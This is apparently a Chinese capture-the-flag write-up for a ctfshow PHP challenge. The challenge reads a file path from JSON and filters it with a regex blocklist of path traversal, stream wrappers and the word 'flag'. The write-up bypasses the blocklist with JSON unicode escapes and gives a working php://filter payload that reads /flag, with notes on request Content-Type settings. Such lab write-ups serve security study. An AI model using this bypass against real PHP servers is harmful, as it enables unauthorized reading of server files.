题目代码

<?php
error_reporting(0);

if (!isset($_GET['source'])) {
  show_source(__FILE__);
  exit();
}

function is_valid($str) {
  $banword = [
    // no path traversal
    '\.\.',
    // no stream wrapper
    '(php|file|glob|data|tp|zip|zlib|phar):',
    // no data exfiltration
    'flag'
  ];
  $regexp = '/' . implode('|', $banword) . '/i';
  if (preg_match($regexp, $str)) {
    return false;
  }
  return true;
}

$body = file_get_contents('php://input');
$json = json_decode($body, true);

if (is_valid($body) && isset($json) && isset($json['page'])) {
  $page = $json['page'];
  $content = file_get_contents($page);
  if (!$content || !is_valid($content)) {
    $content = "<p>not found</p>\n";
  }
} else {
  $content = '<p>invalid request</p>';
}

// no data exfiltration!!!
$content = preg_replace('/ctfshow\{.+\}/i', 'ctfshow{&lt;censored&gt;}', $content);
echo json_encode(['content' => $content]);

解题

代码里有$content = file_get_contents($page)file_get_contents和伪协议配合可以达到我们的效果
php，flag等关键词被过滤了，但在json中可以用unicode绕过。

payload:
GET：?source=1
POST：POST：{"page":"\u0070\u0068\u0070://filter/convert.base64-encode/resource=/\u0066\u006C\u0061\u0067"}（即{"page":"php://filter/convert.base64-encode/resource=/flag"}）

关于json和Content-Type的问题

经测试，hackbar发包时entype为
application/x-www-form-urlencoded (raw)和 application/json是可以的
可以看下发包对比图：

而hackba默认的entype为application/x-www-form-urlencoded会对body中的json进行url编码，导致失败

raw的作用：可以上传任意格式的文本，文本不做任何修饰传到服务端。比如传一些xml，或者json数据，或者text文本数据。
Content-Type的几个类型的解释
成功的截图: